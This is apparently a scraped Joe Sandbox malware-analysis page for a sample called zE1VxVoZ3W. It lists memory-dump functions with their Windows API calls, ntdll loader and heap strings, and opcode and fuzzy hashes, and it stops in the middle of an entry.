Instruction Fuzzy Hash: 3C11E5B1D0015C7AEB11A6E59CC2EEF7F7CDF81398F448069FA14A7241E6384E068BA5

Function 00414453 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(62MfV68M,00000111,00000000,00000000), ref: 004144CA

Strings

62MfV68M, xrefs: 004144D1, 004144D4
62MfV68M, xrefs: 004144BF, 004144C9, 004144DA

Memory Dump Source

Source File: 00000009.00000002.1993276336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_zE1VxVoZ3W.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 62MfV68M$62MfV68M
API String ID: 1836367815-526971814
Opcode ID: 6311ed9b803ebe67d62b0e21c127e9f279eb6ef66073abb1c4ef6e38346bd0e4
Instruction ID: 8830d5527840118c6f7a4cf474fcec6110322a16c9d98fc222a8c54ac2f66f19
Opcode Fuzzy Hash: 6311ed9b803ebe67d62b0e21c127e9f279eb6ef66073abb1c4ef6e38346bd0e4
Instruction Fuzzy Hash: 6601C4B1D0011C7AEB11A6E59C82EEF7B7CDF81798F448069FA14A7241E6384E064BB5

Function 0042CE53 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CE92

Strings

NiA, xrefs: 0042CE56

Memory Dump Source

Source File: 00000009.00000002.1993276336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_zE1VxVoZ3W.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: NiA
API String ID: 3298025750-815913008
Opcode ID: 38173da8966e600dc58c9d2b70ac7ec8ac4f1b5dce13e74e74fc05643b0fe2e8
Instruction ID: b69748aa8a33cb168a1e98b43a7b89434d28623779e3acc1afb463a6fa54be94
Opcode Fuzzy Hash: 38173da8966e600dc58c9d2b70ac7ec8ac4f1b5dce13e74e74fc05643b0fe2e8
Instruction Fuzzy Hash: DEE092B26056047BE610EF59EC41F9B77ACEFC9714F004419FA08A7242D775B911CBB8

Function 0042CE03 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E994,?,?,00000000,?,0041E994,?,?,?), ref: 0042CE42

Memory Dump Source

Source File: 00000009.00000002.1993276336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_zE1VxVoZ3W.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 93f9bc99cc8ac4f978a5b5e6b0b32a95f3fdda044b64acff3cddb5f14e22cbbd
Instruction ID: 766b493a2be2a7beba420d7438280ca74ca681a481cbe48daeb7082ee4c048aa
Opcode Fuzzy Hash: 93f9bc99cc8ac4f978a5b5e6b0b32a95f3fdda044b64acff3cddb5f14e22cbbd
Instruction Fuzzy Hash: FEE06DB22047047FD610EE59EC41F9B77ACDFC9710F40441DFD08A7282D675B9108AB8

Function 0042CEA3 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,0F86FFD1,?,?,0F86FFD1), ref: 0042CED7

Memory Dump Source

Source File: 00000009.00000002.1993276336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_zE1VxVoZ3W.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: a850805f9813f4eb4e469fc8efb24156e05b258a2ec386acf2981a93b7ef1c2e
Instruction ID: f98b3689da83ee3a5c2e9cc791695992254f0de39295c586351a7fd3a3695a32
Opcode Fuzzy Hash: a850805f9813f4eb4e469fc8efb24156e05b258a2ec386acf2981a93b7ef1c2e
Instruction Fuzzy Hash: 11E04F316016147BD210AA5ADC01F97B76CDBC5714F504419FA0867282C679BA118BB4

Function 01092C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01092C24

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eb5e2c7d5b9bfb8c91e983d935f37447737de0718e461d41310d63120d220f43
Instruction ID: 528b5f0fb4abad2e016703dfbc173ca70aadcbb32d6789c82e8ace61873b3288
Opcode Fuzzy Hash: eb5e2c7d5b9bfb8c91e983d935f37447737de0718e461d41310d63120d220f43
Instruction Fuzzy Hash: 3BB09BB1D055C5D5EF51E7E44618717794077D0701F55C062D2430651F8738D1D1F275

Non-executed Functions

Function 010D2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

Initializing the application verifier package failed with status 0x%08lx, xrefs: 010D3176
DisableExceptionChainValidation, xrefs: 010D275F
TracingFlags, xrefs: 010D2549
FrontEndHeapDebugOptions, xrefs: 010D2489
ShutdownFlags, xrefs: 010D24A1
RaiseExceptionOnPossibleDeadlock, xrefs: 010D2579
UnloadEventTraceDepth, xrefs: 010D24C0
ExecuteOptions, xrefs: 010D25A0
DisableHeapLookaside, xrefs: 010D246D
MaxLoaderThreads, xrefs: 010D24EC
LdrpInitializeExecutionOptions, xrefs: 010D317D
@, xrefs: 010D2942
CFGOptions, xrefs: 010D2967
MinimumStackCommitInBytes, xrefs: 010D2BB0
GlobalFlag2, xrefs: 010D2FC0
UseImpersonatedDeviceMap, xrefs: 010D251C
MaxDeadActivationContexts, xrefs: 010D2D82
@, xrefs: 010D2B74
minkernel\ntdll\ldrinit.c, xrefs: 010D3187
GlobalFlag, xrefs: 010D2F3F, 010D3059

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 217992627d38281d13063aa168d6bb0ea3c2942e0859ec16e8c5e2b5ac0954b8
Instruction ID: 91de447d0447a089c754daff0026224545326f2e1158819303e7e203b93b3c85
Opcode Fuzzy Hash: 217992627d38281d13063aa168d6bb0ea3c2942e0859ec16e8c5e2b5ac0954b8
Instruction Fuzzy Hash: 54926C71608346AFE725DE28C880BABB7E8BF84754F04496DFAD4DB251D770E844CB92

Function 011012ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01101706, 01101756, 011017A8, 01101809, 0110184D, 01101895, 011018E6
Free Heap block %p modified at %p after it was freed, xrefs: 0110171B
HEAP[%wZ]: , xrefs: 011016CD, 011016F9, 01101749, 0110179B, 011017FC, 01101840, 011018D9
Heap block at %p has incorrect segment offset (%x), xrefs: 0110181A
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 0110176D
Heap block at %p is not last block in segment (%p), xrefs: 011017B7
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 011018A5
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 011018F8
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 0110186B

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 18775dd6bacb9bb67df5fad661cec69877ff424fcc7f3998181af7b979319c58
Instruction ID: 116433b2414ccf72f0fb97065c8fb054704b493a268f11eb8d9f80a6ad672632
Opcode Fuzzy Hash: 18775dd6bacb9bb67df5fad661cec69877ff424fcc7f3998181af7b979319c58
Instruction Fuzzy Hash: FD12C370A04642EFD72A8F69C481BB6BBF1FF06714F098459E4C68B691D7B8E980CB51

Function 0104D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

Control Panel\Desktop, xrefs: 0104D45D
@, xrefs: 0104D3E9
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0104D3B6
Control Panel\Desktop\MuiCached, xrefs: 0104D62B
PreferredUILanguages, xrefs: 0104D4B8, 0104D4C5
@, xrefs: 0104D663
PreferredUILanguagesPending, xrefs: 010AA8DE
@, xrefs: 0104D49D
MachinePreferredUILanguages, xrefs: 0104D685

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: 648fe914974317a7a6935220a0f82fd69d6e42a24381259406615c73afac21e2
Instruction ID: 5e69d64bf09d50548ddbdf767505a8704cabf53f3be55417af3d5abd4cf29c7c
Opcode Fuzzy Hash: 648fe914974317a7a6935220a0f82fd69d6e42a24381259406615c73afac21e2
Instruction Fuzzy Hash: F4B1ADB15083129FCB61DFA8C490A6FBBE8AB98754F41497EF9C8D7240DB30D944CB92

Function 010E9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

\Sessions, xrefs: 010E9488
\AppContainerNamedObjects, xrefs: 010E94AB, 010E94B9
%s\%u-%u-%u-%u, xrefs: 010E9422
Global\Session\%ld%s, xrefs: 010E94C5
BaseNamedObjects, xrefs: 010E9477, 010E947C
\BaseNamedObjects, xrefs: 010E949E
%s\%ld\%s, xrefs: 010E948D
AppContainerNamedObjects, xrefs: 010E946E, 010E94D6

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 0-3063724069
Opcode ID: f3cb962138a28c55c59165c8e5ef009cccb0e57d077590af6454033581f4308d
Instruction ID: 6e8ced0b8d2b51c982c90d62cc65a4efb80bc78bf0050434982d3065c3d438db
Opcode Fuzzy Hash: f3cb962138a28c55c59165c8e5ef009cccb0e57d077590af6454033581f4308d
Instruction Fuzzy Hash: 0FD1D5B2805316AFD721DA55C844BAFBBE8BF98718F04492AFAD497250D770C904CBD2

Function 01100274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 011003A6, 011004B5, 011005DD, 01100682, 011006D9
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 011006EA
RtlReAllocateHeap, xrefs: 011002BF, 01100362
HEAP[%wZ]: , xrefs: 01100399, 011004A8, 011005D0, 01100675, 011006CC
About to reallocate block at %p to %Ix bytes, xrefs: 011003BA
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 011004D3
Just reallocated block at %p to %Ix bytes, xrefs: 011005F1
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 0110069F

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 40521fa0dd51d632695cae8d370af743372e02ea209112f8aa3267214ff3f095
Instruction ID: 5ca09acc122b6315057f09719f078e2623af9461e0255f5d019f997add898278
Opcode Fuzzy Hash: 40521fa0dd51d632695cae8d370af743372e02ea209112f8aa3267214ff3f095
Instruction Fuzzy Hash: F5D1F335900685EFDB2ADFA8C440BADBBF1FF4A740F098069F4859B692C7B5D981CB14

Function 0104D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0104D0CF
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0104D2C3
@, xrefs: 0104D313
@, xrefs: 0104D0FD
@, xrefs: 0104D2AF
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0104D146
Control Panel\Desktop\LanguageConfiguration, xrefs: 0104D196
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0104D262

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: ca453e5a25db7155fcab6ac79981199137771cf009509e94c77c41c7e5008e8e
Instruction ID: 45ab1b8ce21925d427fe3efe2669db40a1a7f149bc549d073b6ca7f0e89d9bb1
Opcode Fuzzy Hash: ca453e5a25db7155fcab6ac79981199137771cf009509e94c77c41c7e5008e8e
Instruction Fuzzy Hash: F9A17CB19083069FD761CF65C890B9FBBE8BB94725F40492EEAC897240D774D908CF92

Function 0104F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 010ADF64, 010AE0A8, 010AE286, 010AE39E
((LONG)FreeEntry->Size > 1), xrefs: 010AE0B3
HEAP[%wZ]: , xrefs: 010ADF57, 010AE09B, 010AE279, 010AE391
(UCRBlock != NULL), xrefs: 010ADF6F
(LONG)FreeEntry->Size > 1, xrefs: 010AE291
(!TrailingUCR), xrefs: 010AE3A9

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 9c70e29b849b3a39e7b6f76f8644e983c0eb5afdbe2a459c23145e6285da729b
Instruction ID: ff80b06675e70f5ba30e6ff1f2027932640cba3c21ab16f5966dc4b2e180ebb3
Opcode Fuzzy Hash: 9c70e29b849b3a39e7b6f76f8644e983c0eb5afdbe2a459c23145e6285da729b
Instruction Fuzzy Hash: CB42EEB12043829FD715DF68C884AAABBE5FF88704F0849ADF5C58B251DB34E985CB52

Function 0106B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrutil.c, xrefs: 010B840D, 010B84E1
LdrpPreprocessDllName, xrefs: 010B8403, 010B84D7
SxS, xrefs: 010B83ED
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 010B84D0
API set, xrefs: 010B83F4, 010B83F9
DLL %wZ was redirected to %wZ by %s, xrefs: 010B83FC

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: b0ba6c1a5b0f00366d67f774079a338a44509c3683cf3963be56b07c923aa0ec
Instruction ID: 92a88de4034016591b9471ed1cc08432024d73523b298093ecce9b36e3a19517
Opcode Fuzzy Hash: b0ba6c1a5b0f00366d67f774079a338a44509c3683cf3963be56b07c923aa0ec
Instruction Fuzzy Hash: 96C14BB1B002269BDB258B68C8917FEBBEDAF55710F14C0AAEDC1DB291DB74C944C391

Function 010863FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Delaying execution failed with status 0x%08lx, xrefs: 010C4258
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 010C41FE
Process initialization failed with status 0x%08lx, xrefs: 010C413A
_LdrpInitialize, xrefs: 010C40DF, 010C4141, 010C4205, 010C425F
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 010C40D8
minkernel\ntdll\ldrinit.c, xrefs: 010C40E9, 010C414B, 010C420F, 010C4269

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 32c27c3ad9946e7e76dcec688a5e6c7442a777eff39aa073fc91a34bba9e022d
Instruction ID: e6c4225f9fc82d26da1dc4f138ce03d3f8cf0c402af20a26b35fd88749a03bbd
Opcode Fuzzy Hash: 32c27c3ad9946e7e76dcec688a5e6c7442a777eff39aa073fc91a34bba9e022d
Instruction Fuzzy Hash: 88913670B04715DBEB39EF58D865BAE7BA6BF41F24F11006CE9D0AB281DB719841CB90

Function 010FF525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 010FF6F4, 010FF7A1, 010FF7F8
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 010FF809
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 010FF7BE
HEAP[%wZ]: , xrefs: 010FF6E7, 010FF794, 010FF7EB
Just allocated block at %p for %Ix bytes, xrefs: 010FF708
RtlAllocateHeap, xrefs: 010FF56D

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 0-1745908468
Opcode ID: 36f9912ff0db7dab09912b833fdbd73ab5b4bb0824a889ac53914b085149b4bd
Instruction ID: d51fa82e2d35f7b111ccc141f2e926270d6a259297f6eebef233675ff7fc97d0
Opcode Fuzzy Hash: 36f9912ff0db7dab09912b833fdbd73ab5b4bb0824a889ac53914b085149b4bd
Instruction Fuzzy Hash: 88913436900642DFDB15DFA8C482AEDBBF1FF19B14F18406DE6C19BA61CB759841CB14

Function 0107F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010C02E7
RTL: Re-Waiting, xrefs: 010C031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010C02BD

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 9ef9586ec4745f3b826c05b55b1c5a8172799fb66693e6d291ccc5c61a3d83ef
Instruction ID: a899a5795d69c735a933eed17db5689a16b643b1a352281d671e9147b9f22bc9
Opcode Fuzzy Hash: 9ef9586ec4745f3b826c05b55b1c5a8172799fb66693e6d291ccc5c61a3d83ef
Instruction Fuzzy Hash: 4AE1CE34A08742DFD765CF28C884B2ABBE1BB88714F144AADF5E58B2E1D774D844CB46

Function 010751EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

Kernel-MUI-Language-SKU, xrefs: 0107542B
Kernel-MUI-Language-Allowed, xrefs: 0107527B
Kernel-MUI-Number-Allowed, xrefs: 01075247
Kernel-MUI-Language-Disallowed, xrefs: 01075352
WindowsExcludedProcs, xrefs: 0107522A

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 88ddeb95c3dc120186a82c6ba6f5115c57015eac93c13cde39cf0210497e71c1
Instruction ID: a6ac07e9fb26005c7ab93f1a7cbb46ec3719385597da4b837a68ee50ac9cda44
Opcode Fuzzy Hash: 88ddeb95c3dc120186a82c6ba6f5115c57015eac93c13cde39cf0210497e71c1
Instruction Fuzzy Hash: D5F14B72D00229EBCB15DFA9CD809EEBBF9FF48650F15406AE585EB250D7709E01CBA4

Function 010670C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01067C7C, 0106867F
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01067C96, 01068696
HEAP[%wZ]: , xrefs: 01067C6D, 01068670

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 917fe9458658751b5ea6b9ca615da8de956da38983e3e87a8b39d04a8daafc49
Instruction ID: 3d05a64089b5cdd9ee989377a8ab805db95182bb4ed7c7969fa48dd8cfda68b2
Opcode Fuzzy Hash: 917fe9458658751b5ea6b9ca615da8de956da38983e3e87a8b39d04a8daafc49
Instruction Fuzzy Hash: FC13AE70A00356CFDB69CF68C4907ADBBF5BF49304F1481AAD989AB386D734A945CF90

Function 01061070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 010B5884
@, xrefs: 010B5A53
HEAP[%wZ]: , xrefs: 010B5877
!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 010B588F

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 0-3570731704
Opcode ID: 1f2dd5acf71d966c485bb24757e72ee670cafe970516025857b6f5696f58a612
Instruction ID: 18379adde452ce774ce5f3266f0720c9e9c0c030f959d6eca09581466897a8dc
Opcode Fuzzy Hash: 1f2dd5acf71d966c485bb24757e72ee670cafe970516025857b6f5696f58a612
Instruction Fuzzy Hash: B6925B71A01269CFEB65CF28CC90BA9B7F5BF85314F0581EAD989A7291D7309E80CF51

Function 0105A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

6, xrefs: 0105A3F7
8, xrefs: 0105A3E7
LdrResFallbackLangList Enter, xrefs: 0105A3EF
LdrResFallbackLangList Exit, xrefs: 0105A3FF

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: f5efcd11952967aa38a7ecd7be6e792b60aec95ece5377d059fbfcc6f430316d
Instruction ID: 7e925b9daab688943475cfcca2bbc7e91e1f635d4be9300b7e151f3c6a235932
Opcode Fuzzy Hash: f5efcd11952967aa38a7ecd7be6e792b60aec95ece5377d059fbfcc6f430316d
Instruction Fuzzy Hash: 2AC18C74608386CFD791DF58C044BABBBE4BF88704F044AAAF9D58B251E734DA49CB52

Function 01088402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 01088422
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0108855E
@, xrefs: 01088591
minkernel\ntdll\ldrinit.c, xrefs: 01088421

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 48615a130e765367b73615e37a144d34bb8becafd9c900537899bada038600b5
Instruction ID: 6f3a944d1d4f329f31154f8d393425fcbd8e30a32701695095ba2e9d358bc9ee
Opcode Fuzzy Hash: 48615a130e765367b73615e37a144d34bb8becafd9c900537899bada038600b5
Instruction Fuzzy Hash: C4918C71608345AFDB21EF65CC50EAFBAE8BF88754F80492EFAC496151E730D944CB62

Function 011011A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0110124A, 0110125D, 0110125F, 011012C4
HEAP[%wZ]: , xrefs: 0110123D, 011012B7
This is located in the %s field of the heap header., xrefs: 011012D6
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01101261

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-336120773
Opcode ID: 677f57c137433c7077cdcd248f0e106e731889ef824fb8542f22e3790b41817e
Instruction ID: d014a542969176584cd9a00ebcf7ae2cefbc589c3ce5041a543ae79d2f7cd827
Opcode Fuzzy Hash: 677f57c137433c7077cdcd248f0e106e731889ef824fb8542f22e3790b41817e
Instruction Fuzzy Hash: 653114B5610114FFD71ADBA8C885FAA77E8EF05720F250066F581CB2D1DBB8EC44CA55

Function 01049148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

